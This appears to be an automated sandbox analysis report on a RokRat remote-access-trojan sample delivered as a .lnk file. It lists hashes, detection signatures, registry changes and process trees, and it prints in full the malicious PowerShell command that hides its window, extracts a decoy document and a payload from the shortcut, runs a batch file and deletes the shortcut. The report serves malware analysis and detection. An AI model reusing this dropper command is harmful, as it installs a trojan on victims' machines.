rokrat | 53ea99f463412c04f4e1f8116c6b7b76132f44600511e36b702855c1dfefcb98

Analysis

max time kernel
117s
max time network
121s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
28-02-2024 16:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

mal.lnk
Size

221.4MB
MD5

5f6682ad9da4590cba106e2f1a8cbe26
SHA1

7043c7c101532df47c832ce5270745dd3d1e8c08
SHA256

dbd5d662cc53d4b91cf7da9979cdffd1b4f702323bb9ec4114371bc6f4f0d4a6
SHA512

e744d1b0cf232c4cf224cd1413b13e41889692e2d1f29e948fe8d4a5cb1304bca9a7b5de9c34db98c8eb7440761d5233bc5ac6a4fe75de2d4009a06f318c1d35
SSDEEP

24576:P0sde6UvoEkUnigRXTTYdy830QtO0oIJjW7sFAc1Mh5l2yf:Mz6UvRXigjbaJa7f2yf

Score

10^/10

rokrat rat

Malware Config

Signatures

Detect Rokrat payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/552-149-0x0000000007EE0000-0x0000000007FC3000-memory.dmp	family_rokrat
behavioral1/memory/552-150-0x0000000007EE0000-0x0000000007FC3000-memory.dmp	family_rokrat

Rokrat
Rokrat is a remote access trojan written in c++.
rat rokrat
Blocklisted process makes network request 5 IoCs

Processes:

powershell.exe

flow pid process

3 552 powershell.exe
5 552 powershell.exe
7 552 powershell.exe
9 552 powershell.exe
10 552 powershell.exe
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

powershell.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion powershell.exe
Deletes itself 1 IoCs

Processes:

powershell.exe

pid process

2524 powershell.exe
Drops file in Windows directory 2 IoCs

Processes:

powershell.exeWINWORD.EXE

description ioc process

File created C:\Windows\6694.dat powershell.exe
File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present

flow	pid	process
3	552	powershell.exe
5	552	powershell.exe
7	552	powershell.exe
9	552	powershell.exe
10	552	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	powershell.exe

pid	process
2524	powershell.exe

description	ioc	process
File created	C:\Windows\6694.dat	powershell.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE

Modifies registry class 64 IoCs

Processes:

WINWORD.EXErundll32.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\hwp_auto_file	rundll32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\.hwp\ = "hwp_auto_file"	rundll32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

2028 WINWORD.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

cmd.exe

pid process

2532 cmd.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exe

pid process

2524 powershell.exe
552 powershell.exe
552 powershell.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

rundll32.exe

pid process

2484 rundll32.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2524 powershell.exe
Token: SeDebugPrivilege 552 powershell.exe

pid	process
2532	cmd.exe

pid	process
2524	powershell.exe
552	powershell.exe
552	powershell.exe

pid	process
2484	rundll32.exe

description	pid	process
Token: SeDebugPrivilege	2524	powershell.exe
Token: SeDebugPrivilege	552	powershell.exe

Suspicious use of SetWindowsHookEx 10 IoCs

Processes:

WINWORD.EXE

pid	process
2028	WINWORD.EXE
2028	WINWORD.EXE
2028	WINWORD.EXE
2028	WINWORD.EXE
2028	WINWORD.EXE
2028	WINWORD.EXE
2028	WINWORD.EXE
2028	WINWORD.EXE
2028	WINWORD.EXE
2028	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.execmd.exepowershell.execsc.execmd.exepowershell.execsc.execsc.execsc.execsc.exe

description	pid	process	target process
PID 2776 wrote to memory of 2532	2776	cmd.exe	cmd.exe
PID 2776 wrote to memory of 2532	2776	cmd.exe	cmd.exe
PID 2776 wrote to memory of 2532	2776	cmd.exe	cmd.exe
PID 2776 wrote to memory of 2532	2776	cmd.exe	cmd.exe
PID 2532 wrote to memory of 2416	2532	cmd.exe	cmd.exe
PID 2532 wrote to memory of 2416	2532	cmd.exe	cmd.exe
PID 2532 wrote to memory of 2416	2532	cmd.exe	cmd.exe
PID 2532 wrote to memory of 2416	2532	cmd.exe	cmd.exe
PID 2532 wrote to memory of 2524	2532	cmd.exe	powershell.exe
PID 2532 wrote to memory of 2524	2532	cmd.exe	powershell.exe
PID 2532 wrote to memory of 2524	2532	cmd.exe	powershell.exe
PID 2532 wrote to memory of 2524	2532	cmd.exe	powershell.exe
PID 2524 wrote to memory of 2900	2524	powershell.exe	csc.exe
PID 2524 wrote to memory of 2900	2524	powershell.exe	csc.exe
PID 2524 wrote to memory of 2900	2524	powershell.exe	csc.exe
PID 2524 wrote to memory of 2900	2524	powershell.exe	csc.exe
PID 2900 wrote to memory of 2464	2900	csc.exe	cvtres.exe
PID 2900 wrote to memory of 2464	2900	csc.exe	cvtres.exe
PID 2900 wrote to memory of 2464	2900	csc.exe	cvtres.exe
PID 2900 wrote to memory of 2464	2900	csc.exe	cvtres.exe
PID 2524 wrote to memory of 2484	2524	powershell.exe	rundll32.exe
PID 2524 wrote to memory of 2484	2524	powershell.exe	rundll32.exe
PID 2524 wrote to memory of 2484	2524	powershell.exe	rundll32.exe
PID 2524 wrote to memory of 2484	2524	powershell.exe	rundll32.exe
PID 2524 wrote to memory of 2484	2524	powershell.exe	rundll32.exe
PID 2524 wrote to memory of 2484	2524	powershell.exe	rundll32.exe
PID 2524 wrote to memory of 2484	2524	powershell.exe	rundll32.exe
PID 2524 wrote to memory of 704	2524	powershell.exe	cmd.exe
PID 2524 wrote to memory of 704	2524	powershell.exe	cmd.exe
PID 2524 wrote to memory of 704	2524	powershell.exe	cmd.exe
PID 2524 wrote to memory of 704	2524	powershell.exe	cmd.exe
PID 704 wrote to memory of 552	704	cmd.exe	powershell.exe
PID 704 wrote to memory of 552	704	cmd.exe	powershell.exe
PID 704 wrote to memory of 552	704	cmd.exe	powershell.exe
PID 704 wrote to memory of 552	704	cmd.exe	powershell.exe
PID 552 wrote to memory of 2204	552	powershell.exe	csc.exe
PID 552 wrote to memory of 2204	552	powershell.exe	csc.exe
PID 552 wrote to memory of 2204	552	powershell.exe	csc.exe
PID 552 wrote to memory of 2204	552	powershell.exe	csc.exe
PID 2204 wrote to memory of 2376	2204	csc.exe	cvtres.exe
PID 2204 wrote to memory of 2376	2204	csc.exe	cvtres.exe
PID 2204 wrote to memory of 2376	2204	csc.exe	cvtres.exe
PID 2204 wrote to memory of 2376	2204	csc.exe	cvtres.exe
PID 552 wrote to memory of 1732	552	powershell.exe	csc.exe
PID 552 wrote to memory of 1732	552	powershell.exe	csc.exe
PID 552 wrote to memory of 1732	552	powershell.exe	csc.exe
PID 552 wrote to memory of 1732	552	powershell.exe	csc.exe
PID 1732 wrote to memory of 2352	1732	csc.exe	cvtres.exe
PID 1732 wrote to memory of 2352	1732	csc.exe	cvtres.exe
PID 1732 wrote to memory of 2352	1732	csc.exe	cvtres.exe
PID 1732 wrote to memory of 2352	1732	csc.exe	cvtres.exe
PID 552 wrote to memory of 1600	552	powershell.exe	csc.exe
PID 552 wrote to memory of 1600	552	powershell.exe	csc.exe
PID 552 wrote to memory of 1600	552	powershell.exe	csc.exe
PID 552 wrote to memory of 1600	552	powershell.exe	csc.exe
PID 1600 wrote to memory of 1796	1600	csc.exe	cvtres.exe
PID 1600 wrote to memory of 1796	1600	csc.exe	cvtres.exe
PID 1600 wrote to memory of 1796	1600	csc.exe	cvtres.exe
PID 1600 wrote to memory of 1796	1600	csc.exe	cvtres.exe
PID 552 wrote to memory of 2620	552	powershell.exe	csc.exe
PID 552 wrote to memory of 2620	552	powershell.exe	csc.exe
PID 552 wrote to memory of 2620	552	powershell.exe	csc.exe
PID 552 wrote to memory of 2620	552	powershell.exe	csc.exe
PID 2620 wrote to memory of 3044	2620	csc.exe	cvtres.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\mal.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2776

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a "$t1 = 'user32.dll';$t = 'using System; using System.Runtime.InteropServices; public class User32 {[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ', SetLastError = true)]public static extern IntPtr FindWindow(string lpClassName, string lpWindowName);[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ')] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); }'; Add-Type -TypeDefinition $t;$proName = 'powershell.exe'; $cmdMainWindowHandle = [User32]::FindWindow([NullString]::Value, $proName);[User32]::ShowWindow($cmdMainWindowHandle, 0);$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0DD6DA21} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000162E, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x00042C00;$lnkFile.Read($pdfFile, 0, 0x00042C00);$pdfPath = $lnkPath.replace('.lnk','.hwp');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x0004422E,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'public.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x0011D630,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005AA;$lnkFile.Read($stringByte, 0, 0x000005AA);$batStrPath = $env:temp+'\'+'temp.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0011DBDA,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'working.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"&& exit
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:2532

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
3⤵
PID:2416

C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe "$t1 = 'user32.dll';$t = 'using System; using System.Runtime.InteropServices; public class User32 {[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ', SetLastError = true)]public static extern IntPtr FindWindow(string lpClassName, string lpWindowName);[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ')] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); }'; Add-Type -TypeDefinition $t;$proName = 'powershell.exe'; $cmdMainWindowHandle = [User32]::FindWindow([NullString]::Value, $proName);[User32]::ShowWindow($cmdMainWindowHandle, 0);$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0DD6DA21} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000162E, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x00042C00;$lnkFile.Read($pdfFile, 0, 0x00042C00);$pdfPath = $lnkPath.replace('.lnk','.hwp');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x0004422E,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'public.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x0011D630,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005AA;$lnkFile.Read($stringByte, 0, 0x000005AA);$batStrPath = $env:temp+'\'+'temp.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0011DBDA,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'working.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"
3⤵
- Deletes itself
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2524

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ewfp-f_a.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2900

